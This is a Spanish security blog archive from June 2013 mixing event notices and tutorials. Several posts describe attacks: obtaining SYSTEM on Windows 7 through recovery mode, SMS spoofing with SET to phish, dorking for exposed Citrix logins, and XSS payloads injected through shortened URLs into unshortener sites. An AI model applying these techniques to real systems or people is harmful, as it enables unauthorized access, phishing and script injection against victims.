domingo, 30 de junio de 2013

Informe Flu - 130

Compartir este artículo:
A lo largo de la semana hemos publicado los siguientes artículos, ¡disfrutadlos!:

Lunes 24 de Junio

Martes 25 de JunioMiércoles 26 de JunioJueves 27 de Junio
Viernes 28 de Junio

sábado, 29 de junio de 2013

Como ser System en Windows 7 con el modo de recuperación

Compartir este artículo:

El famoso Sticky Keys parece ser el gran método utilizado para acceder con máximos privilegios a un sistema siempre y cuando se tenga acceso físico no restringido. Pero he conocido un método que, al menos es cuanto menos curioso, con el que podremos llegar a disponer privilegios de System. La fuente que me ha hecho llegar la noticia ha sido el blog de IntelComms, en el cual se detalla de manera exacta como llevar a cabo el procedimiento. Tenemos que tener claro un poco el escenario o los requisitos, el cual os comento ahora:

  • Acceso físico a un equipo Windows, por ejemplo, Windows 7.
  • No tener restricciones de acceso a BIOS.
  • Mala leche!

Lo primero que hay que realizar es provocar que la máquina entre en modo de recuperación, para ello en el momento que el sistema operativo se encuentra arrancando o booteando provocaremos el cambio de modo pulsando la combinación de la muerte (CTRL+ALT+SUPR). Una vez conseguido que la máquina no arranque provocando un fallo, Windows entrará en un menú donde el usuario puede elegir entre arrancar normal o en modo recovery.

Tras elegir el modo de recuperación se observará como el proceso entra en ejecución mediante la comunicación del mensaje "Winodws is loading files...". Cuando el mensaje de restaurar tu equipo usando System Restore hay que cancelarlo. En este instante se genera un mensaje de error, donde se pregunta si comunicar el error o no comunicarlo. En la imagen se puede visualizar como existe un hipervínculo que abrirá un cuadro de diálogo en el que se podrá buscar cualquier tipo de ejecutable con el que lanzar una CMD, pero ¿Con qué privilegios? Correcto... es lo que pensáis, la identidad que ejecuta el modo de recuperación es System por lo que si se lanza un proceso en ese entorno, se hará como tal...

Una vez pulsado ese link nos aparecerá un cuadro de diálogo, y tan solo se deberá buscar los ejecutables que se quieren arrancar en esta "sesión". Como se comenta anteriormente, interesante es abrir un CMD y jugar un poco con el entorno...

Interesante vía, totalmente complementaria a otras, o como una prueba ante las pruebas de acceso físico que se hacen a los equipos de las empresas. Interesante reflexión sobre como proteger los equipos para el acceso físico a ellos, al menos deberíamos tener en cuenta alguna cosa como:

  • Proteger BIOS y secuencia de arranque.
  • Cifrado de datos en disco duro.
  • Proteger acceso a BIOS en general.
  • Candado para evitar que nos abran los equipos de la empresa y puedan toquetear el HW.

viernes, 28 de junio de 2013

Solo quedan 3 días para que finalice el Call for papers de la No cON Name

Compartir este artículo:

Buenas a todos, como muchos ya sabréis, solo quedan 3 días para que finalice el Call for papers de la No cON Name. Por lo que si tenéis algún trabajo interesante relacionado con la seguridad de la información terminado o a punto de terminar, ¡os recomendamos enviarlo como propuesta!.

Pablo y yo estuvimos hace un par de años como ponentes y fue una experiencia muy gratificante tanto por el ambiente que se respira, la calidad y la calidez humana y el nivel técnico de los ponentes y del público.

A continuación os dejamos los requisitos necesarios para poder presentar un trabajo:

https://noconname.org/files/cfpncn2013.zip

Y para enviar una propuesta simplemente tenéis que completar el siguiente formulario:

https://noconname.org/propuesta/add/

Nosotros nos pasaremos por el congreso este año como público, por lo que si vais por allí, nos veremos y podremos quedar para charlar y tomar algo ;)Estas son las fechas de la edición de este año:
  • Finalización del plazo de entrega de las solicitudes1 de julio
  • Notificación de aceptación: 15 de julio
  • Entrega del material final de la presentación: 15 de septiembre
  • Congreso Edición 2013: 1 y 2 de noviembre
  • Concurso Capture The Flag: 1 de noviembre
  • Publicación de Ponentes: 1 agosto
  • Publicación de Calendario: 1 de Octubre
  • Apertura inscripciones: 1 junio
Os recordamos también, que los días 30 y 31 de Octubre habrá tres interesantes formaciones que se confirmarán próximamente. ¡Estad atentos!
Nos vemos en la NcN ;)
Saludos!

jueves, 27 de junio de 2013

Acceder a sitios web de manera segura mediante certificados desde Android

Compartir este artículo:

Buenas a todos, hace unas semanas explicamos desde el blog como podíamos enviar correos electrónicos cifrados desde un dispositivo iPad con iOS. En el post de hoy, veremos como acceder a sitios web seguros a través de certificados digitales, pero con dispositivos Android.

De la misma manera que hicimos en iOS, vamos a utilizar un certificado emitido por la Fábrica Nacional de Moneda y Timbre. Cuando solicitemos nuestro certificado a la FNMT y nos presentemos en la Seguridad Social, oficina de Hacienda, o en cualquier otro estamento donde un funcionario pueda verificar nuestra identidad personal contrastándola con un DNI, se nos aprobará la descarga del certificado (formato .pfx).

Una vez que tenemos nuestro certificado lo pasaremos al móvil o tablet con Android (en concreto a la raíz de la tarjeta SD).

Curiosidad: El sistema Android admite los certificados (X.509) que se encuentren almacenados en el almacén de claves PKCS#12.

Una vez copiado bien el certificado o bien el almacén de claves de nuestro PC en la carpeta raíz de la SD, iremos al menú "Ajustes" de Android.

A continuación accederemos a Personal/Seguridad/Almacenamiento de credenciales/Instalar desde almacenamiento:

Ahora se seleccionará el certificado e introduciremos nuestra clave:

Y finalmente, indicaremos un nombre para guardarlo.

En este momento nos solicitará el patrón de desbloqueo por seguridad.

Una vez instalado, desaparecerá la copia del almacenamiento (también es posible instalar certificados desde el correo electrónico o el navegador).

Ahora ya solo nos queda acceder a un sitio web que permita el acceso mediante certificados de la FNMT y probarlo:

Si todo ha ido bien, tendremos configurado el acceso de modo seguro mediante certificados :)

Eso es todo por hoy, saludos!

miércoles, 26 de junio de 2013

Microsoft ofrece suculentas recompensas por vulnerabilidad

Compartir este artículo:

Microsoft está tratando de reclutar a expertos en seguridad e informática en general con el fin de proteger los equipos con sistemas Windows de los ataques a través de vulnerabilidades en el software. Microsoft ofrece recompensas de hasta 150.000 dólares a cualquiera que ayude a identificar y solucione los principales agujeros de seguridad en su software. Microsoft dió a conocer el programa de recompensas, uno de los más generosos de la industria de alta tecnología hasta la fecha. Se busca la vía de evitar que los atacantes sofisticados aprovechen las nuevas tecnologías de seguridad que ha introducido la empresa en las últimas versiones del sistema operativo Windows.

El programa está abierto a los expertos en informática desde tan sólo 14 años, aunque los menores de edad necesitan la autorización de sus padres. Los residentes en países bajo sanciones de Estados Unidos, como Cuba, Irán, Corea del Norte, Sudán y Siria están excluidos del programa. La cuantiosa bonificación probablemente llamará la atención de hackers, que es la idea con la que cuenta Microsoft, por lo que se puede decir que Microsoft está en busca de hackers para fortificar sus sistemas operativos.

Los equipos con sistemas Windows han estado involucrados en la mayoría de los principales ataques a la fecha, incluyendo el crimen cibernético de Citadel en el que se robó más de 500 millones de dólares de los bancos o el virus Stuxnet que atacó el programa nuclear de Irán en 2010, explotando bugs previamente desconocidos en el software de Microsoft.

Los mejores hackers están muy reclutados por las agencias de inteligencia, militares y grandes corporaciones, a los cuales atraen con becas y empleos muy bien remunerados. Los países a día de hoy buscan talento y los hackers de élite son los mejores situados para defender los intereses cibernéticos de un país. Microsoft está compitiendo por la atención de los hackers con talento en un creciente mercado global, donde la información acerca de las vulnerabilidades se vende a los delincuentes o mercado negro, así como a los gobiernos que lo utilizan en las operaciones militares y de inteligencia. La venta del 0day está muy cotizada en cualquier sistema operativo ya que permite explotar vulnerabilidades desconocidas por militares, industria y gobiernos.

Algunas de las otras grandes empresas tecnológicas ya ofrecen programas similares, por ejemplo, Google ha entregado 1,7 millones de dólares en 3 años, incluyendo premios tan grandes como 60.000 dólares. Facebook ha revelado que ha pagado 500.000 a 1 millón de dólares desde que comenzó su programa hace dos años. Adobe no ofrece recompensas, a pesar de que trae a los hackers como consultores temporales para ayudar a resolver problemas de seguridad.

    

martes, 25 de junio de 2013

Herramientas forense para ser un buen CSI. Parte XXVII: Forense en SIM IV de IV

Compartir este artículo:

Buenas a todos, hoy finalizaremos la mini cadena sobre análisis forense de tarjetas SIM de la cadena sobre herramientas forense para ser un buen CSI, analizando como recuperar SMS eliminados de una tarjeta SIM.

Como comentamos anteriormente, una tarjeta SIM se comporta igual que un disco duro, y sus celdas son equiparables a los sectores de un disco duro. Estas celdas almacenan, entre otra, la información sobre los SMS enviados y recibidos, y pueden estar ocupadas o vacías. Independientemente del contenido que contengan, el móvil interpretará si las celdas contienen información analizando un flag "state", que determina si esa celda se encuentra "en uso", o se encuentra libre, lista para borrar.

Las tarjetas SIM almacenan de media unos 20-25 SMS. Cuando se llena, habrá que liberar espacio de la tarjeta SIM para poder almacenar más información (o comenzar a almacenar los SMS en la memoria del móvil). En caso de que se borre un SMS, y se marque como "Free", listo para eliminarse, si todavía no ha llegado un SMS que machaque su contenido, éste podrá recuperarse. Para ello simplemente habrá que restaurar el estado de la celda de "Free" a "In use". Esta tarea es muy sencilla y la podremos realizar con alguna herramienta como SIM Manager 2:

Necesitaremos de nuevo un lector de tarjetas SIM, e introducir el PIN de la tarjeta. Una vez introducidos, si accedemos al apartado de "SMS messages", podremos ver los mensajes de nuestra tarjeta, y recuperar los SMS eliminados con la opción "Undelete". De la misma manera podremos "wipear" los restos del SMS, es decir, eliminarlo definitivamente, con la opción "Wipe SMS".

Con este artículo finalizamos nuestra introducción al análisis forense en tarjetas SIM. Espero que os haga gustado :)

Hasta la próxima!

lunes, 24 de junio de 2013

Defensa en profundidad (I de III)

Compartir este artículo:

Esta nueva serie presenta el modelo Defensa en Profundidad o Defense in Depth con el que las empresas pueden organizar las capas de seguridad para proteger sus activos. Este modelo puede ser complementado con una evaluación de riesgos para inventariar y proteger los activos más importantes de la empresa, mediante el uso de un estudio y clasificación piramidal.

El modelo de defensa en profundidad proviene del entorno militar, es decir, mantener múltiples líneas de defensa, en vez de disponer de una línea de defensa única muy reforzada. El fin de este modelo es el de retrasar el posible avance de un intruso o usuario malintencionado lo máximo posible.

En términos informáticos, este modelo propone la creación de capas de defensa con el objetivo de evitar un ataque directo a la información sensible de un entorno. Además, con este modelo se consigue un mayor tiempo para defenderse y utilizar planes de actuación y mayor probabilidad en la detección de un ataque.

Un símil interesante en la utilización de este modelo sería el de un banco, donde la información sensible sería el dinero que éste dispone en la caja fuerte. Para proteger este dinero, se pueden observar distintas medidas de seguridad como son barreras para evitar alunizajes, cámaras, guardias, un área pública dónde la gente espera su turno, la cual podría ser la DMZ. Cuanto más cerca se encuentre de la caja fuerte, los controles de seguridad aumentan.

Es importante, en el instante de implementar este modelo, conocer de qué se dispone, enumerar activos es algo primordial y muy importante. Es muy común que las empresas o grandes organizaciones no contemplen todas las infraestructuras de las que disponen. En otras palabras, no es una buena práctica no disponer de un inventario y no conocer que tecnologías, soluciones de seguridad e incluso servidores se tienen en la empresa. Además, tampoco es una buena práctica disponer de tecnología por disponer, es decir, más vale tener un servicio, aplicativo, sistema operativo bien configurado que éstos por defecto, simplemente por el hecho de tenerlo.

Otra de las características importante del modelo son las actualizaciones de software. Como se mencionó anteriormente, el software debe estar siempre actualizado. Es verdad, que históricamente las actualizaciones han provocado dolores de cabeza en los administradores. Hay que recalcar que antiguamente, las actualizaciones provocaban errores que podían hacer caer la estabilidad del sistema. Hoy en día, la programación de las aplicaciones es cada día mejor, aunque también más compleja, y la aplicación de parches no constituye un riesgo para la estabilidad de los sistemas.

Hoy en día, disponer de un entorno de pre-producción no supone un coste elevado y es asequible para casi cualquier empresa, el disponer de pocas máquinas con grandes recursos capaces de montar una copia de la infraestructura real. Esta infraestructura no debe disponer de una copia de la información sensible. Las características interesantes de la virtualización son el bajo coste y la existencia de las herramientas P2V, con las que de una máquina física se obtiene una instancia virtual.

La virtualización ayuda a generar entornos de pre-producción, los cuales son copias idénticas de los entornos de producción. Con este método se puede aplicar los parches a las distintas aplicaciones y comprobar que la estabilidad de los sistemas no se pierde. De este modo los administradores pueden estar seguros que al aplicar la actualización en un entorno de producción no habrá sorpresas.

Procedimientos, concienciación y políticas

Los procedimientos son la mejor manera de llevar a cabo las tareas diarias. En el ámbito de la seguridad ocurre exactamente igual, es imprescindible automatizar y poder enumerar los pasos a seguir ante ciertas circunstancias que puedan ocurrir en el día a día de la empresa. La concienciación es algo necesario para los empleados. Los usuarios no técnicos, e incluso algunos técnicos, no ven peligros en el uso de cierta información o ciertos sistemas. Es por ello, que nacen otras medidas como la del mínimo privilegio posible, para contrarrestar el efecto negativo que pueden suponer las acciones de ciertos usuarios en algunos sistemas. ¿Cómo llevar a cabo la concienciación? Esto es algo complejo, lo óptimo es la utilización de cursos en la que los usuarios vean lo fácil que puede llegar a ser el acceso a ciertas partes de su información privada o sensible.

Las políticas de seguridad son algo también de vital importancia. Como política de seguridad, encontrándose en el escalón más bajo en la imagen anterior, se entiende a las acciones con las que se obligan a ciertos usuarios a actuar. En otras palabras, es importante que algunos usuarios, que disponen de ciertos roles utilicen unas políticas de actuación y hábitos. Lo ideal, sería aplicar estar políticas de seguridad a todos los usuarios de la empresa, pero es algo complejo, ya que cada uno dispone de una relevancia distinta y acceden a distintos tipos de información.

domingo, 23 de junio de 2013

Informe Flu - 129

Compartir este artículo:
A lo largo de la semana hemos publicado los siguientes artículos, ¡disfrutadlos!:

Lunes 17 de Junio

Martes 18 de JunioMiércoles 19 de JunioJueves 20 de Junio
  • El jueves hablamos sobre el FesTICval, de la URJC, que comienza la semana que viene y en el que tenemos un año más el orgullo de participar.
Viernes 21 de Junio
Sábado 22 de Junio

sábado, 22 de junio de 2013

Haciendo números en Flu Project

Compartir este artículo:

Buenas a todos,

En el artículo de hoy queríamos recapitular y poner números al tiempo que lleva Flu Project en activo, así como mostrar algunas estadisticas interesantes.

En cuanto a visitantes únicos (por IP), Flu Project lleva en la actualidad un total de 1.717.165 visitas, estamos cerca de los primeros 2 millones. Un número que no nos habríamos podido imaginar cuando comenzó todo y del que vosotros sois culpables, ¡gracias!

De todas esas visitas, la mayor parte provienen de España y Mexico, aunque sorprende en el TOP 10 encontrarse con países como China o Ucrania, dónde no se habla castellano (y os aseguro que no son pocas las visitas desde estos países que nos llegan todos los meses):

En 2012, nos visitábais mayoritariamente desde sistemas operativos Windows, en concreto el 72% de vosotros:

En cuanto a lo que a navegadores se refiere, la mayor parte de los lectores, en el año 2012 lo realizaban desde el navegador firefox, seguido muy de cerca de Google Chrome:

Pero en 2013 parece que la computación móvil, de smartphones y tabletas se está imponiendo, y están comiendo mucho terreno a los ordenadores, tal y como os presentamos en las siguientes estadísticas de acceso por sistema operativo, y por navegador:

Como véis, Linux ha recortado mucho terreno a Windows, y Mac cae un 1%. Por otro lado, Google Chrome ha superado a Firefox como navegador más utilizado, y Android crece increiblemente desde un 3,1% hasta un 22,5%.

En cuanto a lo que a artículos se refiere, el post más leído de la historia de Flu Project sigue siendo el de Miguel Ángel Moreno (¡enhorabuena!): Curso de introducción a Android (Instalación del Android SDK + Hello World)

El libro más descargado es el de Juan Luis G. Rambla, Un Forense llevado a juicio:

http://www.fluproject.hol.es/descargasDirectas/pdf/Un%20forense%20llevado%20a%20juicio.pdf

La herramienta más descargada es Liberad a Wifi, que entre sus dos versiones ya supera el millón de descargas (¡ahí es nada!): http://www.flu-project.com/downloadflu/law-liberad-a-wifi

Volviendo al tema visitas, casi 1000 de vosotros nos leeis a través de nuestro RSS, y 3112, nos seguís en la red social Twitter, uno de nuestros principales canales de comunicación.

Hasta el momento hemos publicado un total de 934 artículos, y en los que habéis escrito casi 3000 comentarios, lo que hace una media de 3 comentarios por post.

Viendo estos números solo nos queda agradeceros todo vuestro apoyo, y que sigáis ahí cada día, prometemos seguir estando a pie de cañón y seguir publicando contenidos interesantes. Os animamos también a que sigáis proponiéndonos ideas y enviandonos artículos y herramientas para compartir en Flu Project.

Nos vemos en la red!

viernes, 21 de junio de 2013

Cloud Computing: ¿Cómo reducir el riesgo?

Compartir este artículo:

Las organizaciones mundiales, ya sean privadas e incluso públicas han adoptado nuevas medidas para la utilización de aplicaciones en la nube, con lo que buscan ayudar e innovar en su negocio u objetivos. Las aplicaciones que automatizan los procesos de ventas, recursos humanos, la colaboración o el correo electrónico son de crecimiento exponencial, permitiendo a las empresas satisfacer sus necesidades en un marco de tiempo más corto que nunca en la historia de la informático y la calidad de negocio.

Existe gran preocupación por la seguridad y el cumplimiento de las legislaciones que se acoplan a la información confidencial, un caso práctico sería la banca o la administración pública española, o cualquier administración de otros países. Cuando un dato cualquier se almacena en la nube o cloud, el propietario pierde gran parte del control directo sobre fugas, robos o incluso la divulgación de dicha información.

En la mayoría de países desarrollados existen leyes de protección de datos, como por ejemplo la ICO en el Reino Unido tiene la capacidad de imponer sanciones grandes a las empresas que incumplan dicha ley. A la ICO se le ha asignado la responsabilidad de asegurar la información en la nube de forma inequívoca a la empresa propietaria de los datos, no al proveedor de la nube.

Hoy en día, las fugas y robos se producen con mayor frecuencia de lo que en un principio se puede pensar. El ICO reportó un incremento grande en los últimos cinco años, y en 2012 Ernst & Young encontró que sólo el 38% de las organizaciones implementaban una estrategia de seguridad adecuada. Las pautas para proteger la información se dividen en etapas, la primera es la de descubrimiento. Antes de poder proteger la información en la nube, lo que se necesita saber es dónde está y quién tiene acceso a la misma:

  • ¿Quién debe tener acceso a cierta información y quién no?
  • ¿Qué tipo de contenido es confidencial, propietario o regulados y como se pueden identificar?
Para proteger la información utilizando herramientas correctas se pueden utilizar las siguiente recomendaciones:
  • Cifrar: grado militar de 256 bits AES.
  • Llaves de cifrado protegidas y siempre bajo control.
  • Una nube de prevención de pérdida de datos.
  • Detección de malware en el cloud.

La nube ha llegado ya hace tiempo a nuestras empresas, y la seguridad y legislaciones son el punto de partida que van de la mano en este nuevo mundo que nos vigila.

jueves, 20 de junio de 2013

La semana que viene comienza el FesTICval

Compartir este artículo:

Buenas a todos,

Todos los años la Universidad Rey Juan Carlos de Madrid organiza un festival para la promoción de las Tecnologías de la Información y las Comunicaciones (TIC) que consiste en una serie de talleres y actividades dirigidos principalmente a estudiantes de secundaria y bachillerato.

Lo organizan las Escuelas de Ingeniería Informática y de Telecomunicación en los Campus de Móstoles y Fuenlabrada de la URJC y es totalmente gratuito.

Este año, en su sexta edición, el FesTICval tendrá lugar del 25 al 27 de Junio de 2013, en los campus de Móstoles y Fuenlabrada de la URJC.

Tenéis toda la información sobre el evento en el siguiente enlace:

https://sites.google.com/site/festicval/

Podéis ver el calendario completo de actividades en el siguiente enlace:

https://sites.google.com/site/festicval/programa-de-actividades

Al igual que el año pasado, Flu Project intervendrá con dos talleres:

  • Seguridad por defecto: el mundo telemático de hoy

Objetivos: De la mano de Flu-Project, los alumnos obtendrán una visión global acerca de la importancia de la seguridad informática en el día a día. El uso de todo tipo de dispositivos y las amenazas que existen en Internet hacen que los usuarios queden en peligro en la gran red. El taller proporcionará a los alumnos un primer acercamiento a los peligros y cómo protegerse de este tipo de ataques en Internet.

Metodología: Tras una breve introducción se irán descubriendo los problemas de seguridad más habituales y cómo resolverlos de forma práctica. El enfoque del taller es eminentemente práctico, aunque se utilizarán ciertos minutos iniciales de teoría para que los alumnos puedan entender ciertos conceptos básicos.

  • Redes Sociales: la informática está en las calles

Objetivos: En este taller los compañeros de Flu-Project expondrán los usos y peligros de las redes sociales actualmente. La concienciación de la sociedad es importante para llevar a cabo el correcto uso de estas potentes herramientas. Además, el alumno obtendrá una visión global de las técnicas oscuras para obtener información de otros usuarios sin ciertos permisos.

Metodología: Enfoque eminentemente práctico, con explicación previa de conceptos básicos.

Descarga el programa de actividades en PDF desde aquí.

Nos vemos en el FesTICval, festicval, festicval.... ;)!

miércoles, 19 de junio de 2013

SMS Spoofing Attack Vector

Compartir este artículo:

Hola a tod@s

Ya vimos como Clonar una Web con SET y QRCode Generator Attack Vector, hoy es el turno de utilizar SET con los dispositivos móviles, como es la técnica de SMS Spoofing.

Los ciberdelincuentes realizan autenticas mega campañas con esta técnica enviado SMS masivos a multitud de teléfonos móviles y con diferentes tácticas, como suplantación de la web bancaria y varias plantillas realizadas a “manopla” por ellos mismos, se hacen pasar el banco, compañías de teléfonos, incluso un amigo o familiar.Su objetivo es que a través del SMS recibido accedas a una URL maliciosa o clonada y pierdas tu passwords o ahorros €/$. Para comenzar iniciamos SET, nos saldrá el menú de inicio. A continuación indicamos la opción deseada, en nuestro caso Social-Engineering Attacks. En la siguiente imagen elegimos la técnica de SMS Spoofing Attack Vector. En este punto, la herramienta pregunta si deseas realizar una plantilla o utilizar las definidas por la aplicación.

En la anterior imagen lo primero que nos pregunta es si el envío de SMS se va realizar de forma masiva, es decir a varios teléfonos o por el contrario a un solo teléfono, en nuestro caso el envío será a un solo teléfono, el mío.

Ahora toca elegir la plantilla definida, pueden ser de Movistar, tu banco, Vodafone, para esta PoC elegiremos la opción número diez.

Para finalizar el receptor recibirá el SMS spoofeado, como comente anteriormente, el SMS puede inducir a la víctima a que facilite sus credenciales de banco, correo electrónico, etcétera, o que haga clic en una URL maliciosa para la descarga de software malicioso o simplemente una web clonada en la que perdería sus credenciales.

Y "voilá" el SMS llega a su receptor, como se puede apreciar el atacante quiere hacerle ver a la víctima que por tantos años como cliente en su compañía de teléfonos se ha ganado llamadas gratuitas para siempre, haciendo que accedan a su web maliciosa. Por cierto, una aclaración la herramienta no interpreta las tildes, ni la letra Ñ como se puede observar en el SMS recibido.

n0ipr0csNo seáis malos.

martes, 18 de junio de 2013

Desarrollo de aplicaciones Android seguras

Compartir este artículo:

Hoy es el turno del libro de "Desarrollo de aplicaciones Android seguras" escrito por mi gran amigo Miguel Ángel Moreno Álvarez. Con Miguel Ángel he pasado muchas como se puede ver quién lea el prologo, el cual tuve el placer de escribir. El libro propone una serie de capítulos donde el lector va a ir aprendiendo a diseñar e implementar aplicaciones Android de manera segura.

El libro brinda la oportunidad tanto a noveles como a usuarios avanzados a adentrarse en un interesante mundo, como es el mundo de Android. Es el sistema operativo de smartphones más utilizado del mercado, y en generar de los dispositivos móviles. Este mercado representa una vía en auge en el mundo laboral, ya que es presente y futuro de la informática que conocemos.

Actualmente, el mundo de las aplicaciones móviles es uno de los sectores que más dinero mueve dentro del mercado de la informática. A pesar del momento económico que atraviesa el país, el 84% de las empresas españolas que se dedican a desarrollar aplicaciones móviles han crecido y generado empleo durante todo el año 2012. Este crecimiento tan acelerado ha supuesto una gran demanda por parte de las empresas para encontrar personal especializado en el desarrollo de aplicaciones móviles. Tener conocimientos de programación en una o varias plataformas móviles es una garantía para poder encontrar empleo a día de hoy.

“Desarrollo de aplicaciones Android seguras” pretende inculcar al lector una base sólida de conocimientos sobre programación en la plataforma móvil con mayor cuota de mercado del mundo: Android. Mediante un enfoque eminentemente práctico, el libro guiará al lector en el desarrollo de las funcionalidades más demandadas a la hora de desarrollar una aplicación móvil: la persistencia de datos, el uso del GPS, la interacción con servicios web, etcétera. Además, con este libro se pretende educar al programador e introducirle en la utilización de técnicas de diseño que modelen aplicaciones seguras, tanto en la parte de almacenamiento de datos como en la parte de comunicaciones.

Miguel Ángel ha sido capaz de buscar la estructura metodológica adecuada para que con la lectura de este libro el lector adquiera los conocimientos de este lenguaje. El lector dispone de una lectura sencilla, mediante el uso de ejemplos y pruebas de concepto, además de facilidad para implementar lo que se propone en estas hojas. Pedagógicamente es un libro preparado para la enseñanza y fácil comprensión, cuidado hasta el mínimo detalle para buscar la complicidad con el lector, el cual se sentirá cómodo entendiendo los conceptos y ejemplos en estas hojas presentados. Libro totalmente recomendado en la nueva editorial 0xWord.

lunes, 17 de junio de 2013

El día 26 participaremos en el Seminario Internacional sobre los retos de la privacidad: Innovación, derecho y seguridad

Compartir este artículo:
Buenas a todos, el próximo día 26 de Junio participaré en una mesa redonda sobre seguridad en Internet, lucha contra la ciberdelincuencia y sistemas de interceptación policial dentro del SEMINARIO INTERNACIONAL SOBRE “LOS RETOS DE LA PRIVACIDAD: INNOVACIÓN, DERECHO Y SEGURIDAD” de la Catedra Google. La mesa redonda estará moderada por  José de la Peña. Director de SIC, y participarán conmigo:
  • Juan Luis García Rambla: Director Técnico de Seguridad en Sidertia Solutions. Responsable del equipo de implantación de sistemas de seguridad, auditoría y análisis forense de la organización.
  • Juan Antonio Calles García. Consultor senior de seguridad en Everis. Creador de Flu– AD, la herramienta de interceptación policial.
  • Carlos Represa Estrada: Director del Centro de Seguridad TIC Escolar. Coordinador de la Escuela de Seguridad en la Red
  • Cesar Lorenzana. Capitán en Grupo de Delitos Telemáticos de la Guardia Civil. Jefe de investigación de delitos telemáticos de la Unidad Central Operativa de la Policía Judicial
  • Juan Miguel Manzanas. Comisario Jefe de la BIT.
Podéis ver el resto del programa del Seminario AQUÍ.La inscripción al evento es gratuita, pero el aforo es limitado, por lo que si os interesa asistir tendríais que apuntaros a la mayor brevedad.Para formalizar la inscripción debéis enviar éste DOC relleno por correo electrónico a la cuenta de correo: rosario.duasocales@colaborador.ceu.esNos vemos en la red ;)

domingo, 16 de junio de 2013

Informe Flu - 128

Compartir este artículo:
A lo largo de la semana hemos publicado los siguientes artículos, ¡disfrutadlos!:

Lunes 10 de Junio

Martes 11 de JunioMiércoles 12 de JunioJueves 13 de Junio
Viernes 14 de Junio
Sábado 15 de Junio

sábado, 15 de junio de 2013

Ya podéis descargar el podcast de nuestra entrevista en Radio 3W

Compartir este artículo:
 Buenas a todos,Como muchos ya sabéis, ayer tuvimos el enorme placer de participar en el programa de radio Ventanas a la Red, de Pilar Movilla, en Radio 3W.Si te lo perdiste, ya lo puedes descargar gratuitamente en formato podcast desde el siguiente enlace:

http://radio3w.com/podcast/VENTANASALARED/VENTANASALARED_20130614.mp3

Disfrutadlo!!!

viernes, 14 de junio de 2013

Hoy a las 17:00 sintoniza Radio 3W

Compartir este artículo:

Buenas a todos, hoy tenemos el enorme placer de comunicaros que estaremos desde las 17:00 en el programa de radio Ventanas a la red, de Pilar Movilla, en Radio 3W.

Durante el programa hemos tenido la oportunidad de hablar de Flu Project desde sus origenes, de las Jornadas X1RedMasSegura, de Flu-AD y aún tuvimos tiempo para charlar sobre el borrador de anteproyecto de Código Procesal Penal del Ministerio de Justicia, también conocido como "el troyano policía".

Aprovechamos el post para dar las gracias a Radio 3W y a Pilar (@pilarmov), tienen un equipo fantástico y nos hicieron sentir en todo momento como en casa, y a Angelucho, culpable de que nos dejásemos liar ;)

 

Para poder escucharnos no tienes más que acceder a la web de Radio 3W (http://radio3w.com/), y pulsar en "On air" a partir de las 17:00 de la tarde :)

Nos vemos en la red! (hoy... nos oímos ;))

jueves, 13 de junio de 2013

Bing Hacking y Citrix

Compartir este artículo:

Hola a tod@s

Nadie duda del potencial de Google Hacking, ya que podemos explotar gran capacidad de almacenamiento de información que contiene Google, todo ello buscando información específica que ha sido añadida a las bases de datos del buscador, la mayoría de ocasiones por desconocimiento de los administradores de sistemas.  Es por ello que con Google Hacking no se comete ningún delito, tan sólo se utiliza Internet e información pública, hoy quiero poner como ejemplo los servicios citrix que muchas empresas utilizan para publicar sus páginas web.

Yo utilizare el buscador Bing por una sencilla razón, Google está ya muy trillado con esto del Google Hacking. Por otro lado también es necesario tener instalado un cliente citrix.

 

Imagen 1: Busqueda con Bing

El "verbo" contains le indica que filtre la búsqueda sólo a archivos .ica:

Imagen 2: Web Encontrada

Tras los verbos introducidos el buscador nos listará varias páginas web, vamos a utilizar esta web al azar.

 

Imagen 3: Filtrar Búsqueda

A continuación vemos el código fuente  de la pagina y buscamos la dirección donde se encuentra el archivo .ica.

 

Imagen 4: URL Archivo .ica

Como podéis observar la búsqueda ha sido fructífera y hemos encontrado un enlace a un archivo .ica.

Imagen 5: Conectando la Aplicación

Ahora abrimos esa URL en una pestaña nueva del navegador y comenzará a cargar la aplicación.

 Imagen 6: Acceso Server 2003

A continuación se nos abrirá una bonita ventana de acceso a Windows Server 2003. Si nos autenticáramos tendríamos acceso total a la red local donde se encuentra la aplicación citrix y podríamos ver todos los documentos, programas y carpetas contenidas en ese PC.

n0ipr0cs

No seáis malos.

miércoles, 12 de junio de 2013

URL UNSHORTENERS: Cazado por ser precavido

Compartir este artículo:

El mundo de la seguridad también tiene sus curiosas ironías. En este post veremos cómo te la pueden meter doblada, precisamente, por intentar ser precavido.A estas alturas ya todos conocemos y usamos de manera activa o pasiva los acortadores de URLs. Ahorramos espacio, nos sacan de apuros en Twitter, conseguimos un efecto sorpresa al ocultar la URL original...

http://bit.ly/15q0CUY

Supongo que te hubieras pensado dos veces pulsar en el enlace anterior si hubieras leído el nombre del archivo en la URL final. O quizá no, el morbo no tiene límites :P. Aunque cueste creerlo, en esta jungla virtual hay peligros mucho mayores que nuestro amigo David desnudo, con millones de webs infectadas de todo tipo de malware y perrerías. Precisamente para intentar evitar sorpresas desagradables, nacieron las webs que nos proporcionan el servicio contrario de "unshortening", es decir, nos desvelan la URL original a partir de una URL acortada.

¿Qué pasaría si las webs que ofrecen estos servicios fueran vulnerables a ataques inyectados en la propia URL original? Por el simple hecho de ser precavidos y consultar una URL, seríamos directamente víctimas de los tipos de ataques que, irónicamente, queremos evitar. Algo así como ir a ver si la pistola está cargada y que se te dispare en la cara.Con esta idea, se me ocurrió testear la seguridad de algunas de las webs que ofrecen servicios de "unshortening". El resultado fue terrorífico, ya que prácticamente todas las testeadas que ofrecen esta funcionalidad eran vulnerables a ataques XSS.Lo primero, fue fijar una URL que referenciara a un supuesto archivo llamado "><img src="1" onerror="alert('OWNED!!')">.html. Algo como...

http://www.evilchistera.com/"><img src="1" onerror="alert('OWNED!!')">.html

Este nombre de archivo es totalmente válido en sistemas Unix y puede existir perfectamente en un servidor web. No es necesario que la URL sea real para hacer la prueba, ya que de momento lo único que nos interesa es crear una URL corta que la resuelva. El siguiente paso, por tanto, es generar su hermana pequeña en cualquier servicio acortador de URLs como https://bitly.com/, y a jugar...

Al introducir la URL acortada en la gran mayoría de los servicios de URL unshortener el ataque se ejecuta con éxito:

Pero, ya que tenemos control total sobre la página, ¿por qué no hacer la gracia completa y en vez de sacar un inocente alert hacemos que el ataque fuerce al usuario directamente a visitar la web que queramos? Es decir, ¿por qué no hacer que directamente visite la web de nuestro amigo David Hasselhoff nada más consultar la URL acortada en el servicio de unshortening? Modificamos el vector de ataque...

http://www.evilchistera.com/"><script>location.href='http://bit.ly/15q0CUY'</script>

